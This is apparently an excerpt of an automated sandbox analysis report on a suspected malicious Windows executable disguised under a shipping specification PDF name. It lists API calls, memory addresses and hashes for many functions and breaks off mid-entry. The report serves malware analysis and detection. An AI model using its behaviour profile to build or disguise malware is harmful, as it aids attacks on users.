                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                      • String ID:
                                      • API String ID: 4217664535-0
                                      • Opcode ID: 58772ec42805bd110c7503656c89539b0c48cf5aad2c34b13b004dd5d4e2f088
                                      • Instruction ID: a6ad6a0e6b15bcfd8315bee66c9b8d2344ef544dc5d9c6af6f59b194cdee17f7
                                      • Opcode Fuzzy Hash: 58772ec42805bd110c7503656c89539b0c48cf5aad2c34b13b004dd5d4e2f088
                                      • Instruction Fuzzy Hash: F211BC71A01205AFCB269F98CC84FAEB7BDEF84304F14846DE94AD7211D739AE44CB10
                                      Function 0037B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0037B498
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037B4AA
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037B4C0
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037B4DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: c02d6b2f9d8a2f9663eff918c7384b0e2390215488af724371bf25ebbc5d90ba
                                      • Instruction ID: 23c9468dc8065a1042317240ae6c4f233c6ea7875f2487c0ce0918beb95d6695
                                      • Opcode Fuzzy Hash: c02d6b2f9d8a2f9663eff918c7384b0e2390215488af724371bf25ebbc5d90ba
                                      • Instruction Fuzzy Hash: 0611187A900218FFDB21DFA9C985F9DBBB8FB08710F208091E604B7295D771AE11DB94
                                      Function 0035B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0035B5A5
                                      • GetClientRect.USER32(?,?), ref: 003BE69A
                                      • GetCursorPos.USER32(?), ref: 003BE6A4
                                      • ScreenToClient.USER32(?,?), ref: 003BE6AF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Client$CursorLongProcRectScreenWindow
                                      • String ID:
                                      • API String ID: 4127811313-0
                                      • Opcode ID: a12d916a70fabac065edd8ffeb87ee12c0bd74325b31f77aa71fdac64ec954af
                                      • Instruction ID: b8a12abddfd131a7208d2fe8a85a83aeafc36047570838387b2b6c948662e1f2
                                      • Opcode Fuzzy Hash: a12d916a70fabac065edd8ffeb87ee12c0bd74325b31f77aa71fdac64ec954af
                                      • Instruction Fuzzy Hash: 20113631900029BBCB16DF98CC45DEEB7B8EB0A305F500865F902E7150E334BA95CBA5
                                      Function 0038732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00387352
                                      • MessageBoxW.USER32(?,?,?,?), ref: 00387385
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0038739B
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003873A2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 2880819207-0
                                      • Opcode ID: bcea54f14fc1bf8cab4b56f16cb395acf0b46a71998371d7bf7f9b6c46c8a295
                                      • Instruction ID: 26337d553186dc324c353fcd47771e4612f386e0b51649c54035ace722d4c541
                                      • Opcode Fuzzy Hash: bcea54f14fc1bf8cab4b56f16cb395acf0b46a71998371d7bf7f9b6c46c8a295
                                      • Instruction Fuzzy Hash: 6911E576A04304AFC7029F689C09E9E7FAE9B45311F1442B9F825E3251D7B0D90097A5
                                      Function 0035D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                      • GetStockObject.GDI32(00000011), ref: 0035D1CE
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateMessageObjectSendStockWindow
                                      • String ID:
                                      • API String ID: 3970641297-0
                                      • Opcode ID: fafb54190b632c3612ab66c6cd48efbf6ddc607108033aa71c5e4c6e27329cc9
                                      • Instruction ID: 25b15e5744f82d4dd2b7290c8c5dc1c954ac9f6480d8d8801c3bb516b0864dcc
                                      • Opcode Fuzzy Hash: fafb54190b632c3612ab66c6cd48efbf6ddc607108033aa71c5e4c6e27329cc9
                                      • Instruction Fuzzy Hash: AA118B72101909BFEB638F949C50EEABB6DFF08365F050115FE1596060C732EE609BA0
                                      Function 00372DE3 Relevance: 6.1, APIs: 4, Instructions: 52timethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00372E17
                                      • GetCurrentThreadId.KERNEL32 ref: 00372E26
                                      • GetCurrentProcessId.KERNEL32 ref: 00372E2F
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00372E3C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                      • String ID:
                                      • API String ID: 2933794660-0
                                      • Opcode ID: 699cbd0f9c826ecfdb0d7b28908c3746e3e1136cc711179f4b52a93b8521615e
                                      • Instruction ID: 3c331e3e0bd0188f716cc3f437e5ce0753f8f007ba0f698ce76f704fc7261d8f
                                      • Opcode Fuzzy Hash: 699cbd0f9c826ecfdb0d7b28908c3746e3e1136cc711179f4b52a93b8521615e
                                      • Instruction Fuzzy Hash: F6115EB1D015089BCF26DBB4D958AAEB7B8FF08301F95446EE40BE7650EB389A00CB55
                                      Function 003AEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0035AFE3
                                        • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035AFF2
                                        • Part of subcall function 0035AF83: BeginPath.GDI32(?), ref: 0035B009
                                        • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035B033
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003AEA8E
                                      • LineTo.GDI32(00000000,?,?), ref: 003AEA9B
                                      • EndPath.GDI32(00000000), ref: 003AEAAB
                                      • StrokePath.GDI32(00000000), ref: 003AEAB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: a86f531335dbda1fbd5a5dbe206fe138735bcd68e9eb675d204f1de602c49fa5
                                      • Instruction ID: 6b19b16d04e33961360f21b90b21ef4c7174a401c65040557e29038e6f5b49c7
                                      • Opcode Fuzzy Hash: a86f531335dbda1fbd5a5dbe206fe138735bcd68e9eb675d204f1de602c49fa5
                                      • Instruction Fuzzy Hash: F7F08232005269BBDB139F98AD0DFCE3F59AF06311F084211FE11A50F187756561DB99
                                      Function 0037C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0037C84A
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0037C85D
                                      • GetCurrentThreadId.KERNEL32 ref: 0037C864
                                      • AttachThreadInput.USER32(00000000), ref: 0037C86B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: ad92b9c9c89e8769e4b45aec2965be43c023d103b98d37c7eaeaa88cfd6b7aed
                                      • Instruction ID: 4f9b9ab5b0ae5b9e1b51af34fad7c9ae5dc0c21f55fc411178936e51e7b74aaa
                                      • Opcode Fuzzy Hash: ad92b9c9c89e8769e4b45aec2965be43c023d103b98d37c7eaeaa88cfd6b7aed
                                      • Instruction Fuzzy Hash: 70E06D71141228BADB225BA2EC0DEDB7F1CEF067A1F408029B60DC4461C6B5D590CBE0
                                      Function 0037B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 0037B0D6
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,0037AC9D), ref: 0037B0DD
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0037AC9D), ref: 0037B0EA
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,0037AC9D), ref: 0037B0F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: 44d04a065dd386f091cbae1b5cfb6e369d35457b14e4c226318bf40af962d3ad
                                      • Instruction ID: 40f7027a0739169b0df9c275fa7c0bca2bb0303336bf15b2ec71750990162f5c
                                      • Opcode Fuzzy Hash: 44d04a065dd386f091cbae1b5cfb6e369d35457b14e4c226318bf40af962d3ad
                                      • Instruction Fuzzy Hash: 63E04F32601221DBD7211FB55C0CF477BACAF55791F028828B245DA040DB2894028760
                                      Function 0035B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 0035B496
                                      • SetTextColor.GDI32(?,000000FF), ref: 0035B4A0
                                      • SetBkMode.GDI32(?,00000001), ref: 0035B4B5
                                      • GetStockObject.GDI32(00000005), ref: 0035B4BD
                                      • GetWindowDC.USER32(?,00000000), ref: 003BDE2B
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 003BDE38
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 003BDE51
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 003BDE6A
                                      • GetPixel.GDI32(00000000,?,?), ref: 003BDE8A
                                      • ReleaseDC.USER32(?,00000000), ref: 003BDE95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                      • String ID:
                                      • API String ID: 1946975507-0
                                      • Opcode ID: 1d280b02722bbab2541ba537161e328633d825bb5e363c5197e3400e9ba50331
                                      • Instruction ID: 1689fb2547e4c7141857f156102d7b75c99c41916cf0784316a7aaf4e53e3343
                                      • Opcode Fuzzy Hash: 1d280b02722bbab2541ba537161e328633d825bb5e363c5197e3400e9ba50331
                                      • Instruction Fuzzy Hash: 30E06D31100240AFDF231B64AC09FD87B15AB1233AF04C226FBA9980E1C7719580CB11
                                      Function 003BB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 613575ea2876c95b02a88ad9af1726552efee208a21df340be8180c70fe67480
                                      • Instruction ID: df33ad8a3a4eab4ab9e9d3e3e94c5273caec0617b04fb07e5605059e06e74d24
                                      • Opcode Fuzzy Hash: 613575ea2876c95b02a88ad9af1726552efee208a21df340be8180c70fe67480
                                      • Instruction Fuzzy Hash: 76E01AB1100204EFDB025F709848E6E7BACEB4C355F118825FD9ACB221CB75A8409B40
                                      Function 0037B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0037B2DF
                                      • UnloadUserProfile.USERENV(?,?), ref: 0037B2EB
                                      • CloseHandle.KERNEL32(?), ref: 0037B2F4
                                      • CloseHandle.KERNEL32(?), ref: 0037B2FC
                                        • Part of subcall function 0037AB24: GetProcessHeap.KERNEL32(00000000,?,0037A848), ref: 0037AB2B
                                        • Part of subcall function 0037AB24: HeapFree.KERNEL32(00000000), ref: 0037AB32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                      • String ID:
                                      • API String ID: 146765662-0
                                      • Opcode ID: b08538f6c5a149fbe855996855f6fdf94dbb9b2897c017b5741fb8fe8e71620e
                                      • Instruction ID: 38eacd0ce628d480388eaae9e7e9039930095baad2c9deef7950416482dc1b81
                                      • Opcode Fuzzy Hash: b08538f6c5a149fbe855996855f6fdf94dbb9b2897c017b5741fb8fe8e71620e
                                      • Instruction Fuzzy Hash: 36E0263A104405BBDB026FA5EC08C59FBAAFF993217108631F625C15B5CB36B871EB91
                                      Function 003BB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: ac3c629356bc00e2f9a4b9514c55a76bb97dbd5614db2a078b5b41b275aabdb3
                                      • Instruction ID: 55cd22d27efabb7015a962392549f67b402dc50ae1bd761079e4d0ebd1d028d2
                                      • Opcode Fuzzy Hash: ac3c629356bc00e2f9a4b9514c55a76bb97dbd5614db2a078b5b41b275aabdb3
                                      • Instruction Fuzzy Hash: 51E012B1500200AFDB025F709848A297BA8EB4C355F118829FD9ACB221CB79A840CB00
                                      Function 0037DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0037DEAA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ContainedObject
                                      • String ID: AutoIt3GUI$Container
                                      • API String ID: 3565006973-3941886329
                                      • Opcode ID: 1c937879842d8d0f3603b8b41e59d9d5f437606eb47d06cb246f287c5305b471
                                      • Instruction ID: bf3732f05c99c679e314c52ed655088ab0d490a94d1d8bb91616bbeb2c173290
                                      • Opcode Fuzzy Hash: 1c937879842d8d0f3603b8b41e59d9d5f437606eb47d06cb246f287c5305b471
                                      • Instruction Fuzzy Hash: E7913674600601AFDB26DF64C884E6AB7B9AF48710B14846EF94ACF691DB75E841CB60
                                      Function 0035BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 0035BCDA
                                      • GlobalMemoryStatusEx.KERNEL32 ref: 0035BCF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: da344042abf9430102b7605ff5b60c1442714176eb53342f26ba091fbce16fb3
                                      • Instruction ID: 75dbea775128eac3cda09baf4ac5d15af68d362fcaaa98dfab1b604933904097
                                      • Opcode Fuzzy Hash: da344042abf9430102b7605ff5b60c1442714176eb53342f26ba091fbce16fb3
                                      • Instruction Fuzzy Hash: E8513071408B449BE321AF14D886FABBBECFB95355F41484EF5C8821B2EB7084ACC756
                                      Function 003AA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 003AA85A
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003AA86F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: 2fd2b00990d15303bd007cfaf9828bc81263980a1e41705fbd0cc973845d3ad3
                                      • Instruction ID: cb096f471f8fd1662aae4099965fdb7bfc376ea4f7072a64013e3c241f44a7b1
                                      • Opcode Fuzzy Hash: 2fd2b00990d15303bd007cfaf9828bc81263980a1e41705fbd0cc973845d3ad3
                                      • Instruction Fuzzy Hash: EC410775E017099FDB55CFA8C880BEA7BB9FB09300F11016AE905EB391D775A942CFA1
                                      Function 00395180 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003951C6
                                      Strings
                                      Memory Dump Source
